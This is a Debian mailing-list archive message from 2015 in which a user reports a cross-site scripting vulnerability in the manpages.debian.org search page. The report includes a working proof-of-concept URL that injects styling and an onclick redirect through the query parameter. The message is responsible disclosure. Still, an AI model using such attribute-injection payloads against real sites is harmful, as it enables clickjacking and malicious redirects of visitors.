[
Date Prev
][
Date Next
] [
Thread Prev
][
Thread Next
] [
Date Index
] [
Thread Index
]
XSS in Manpage Search
To
:
debian-www@lists.debian.org
Subject
: XSS in Manpage Search
From
: Gary McAdam <
gpmcadam@gmail.com
>
Date
: Fri, 17 Jul 2015 21:38:51 +0100
Message-id
: <
[🔎]
0F4B1F99-DD3E-435A-99CF-CD6C4863DF6D@googlemail.com
>
Hi,
I found an XSS vulnerability on the manage search page.
http://manpages.debian.org/cgi-bin/man.cgi?query=Click%20Here%20for%20Free%20Money%22%20style=%22width:100%;height:100%;cursor:pointer;z-index:10000;font-size:100px;text-align:center;border:1px%20solid%20lightgray;border-radius:5px;%22%20onclick=%22window.location=%27http://www.reddit.com/r/xss%27;%22%20%22
Kind regards,
Gary
Reply to:
debian-www@lists.debian.org
Gary McAdam (on-list)
Gary McAdam (off-list)
Follow-Ups
:
Re: XSS in Manpage Search
From:
Javier Fernandez-Sanguino <jfs@computer.org>
Prev by Date:
Re: /devel/people duplicate entry due to typo - attempted patch
Next by Date:
website for jessie release notes is wrong.
Previous by thread:
Re: /devel/people duplicate entry due to typo - attempted patch
Next by thread:
Re: XSS in Manpage Search
Index(es):
Date
Thread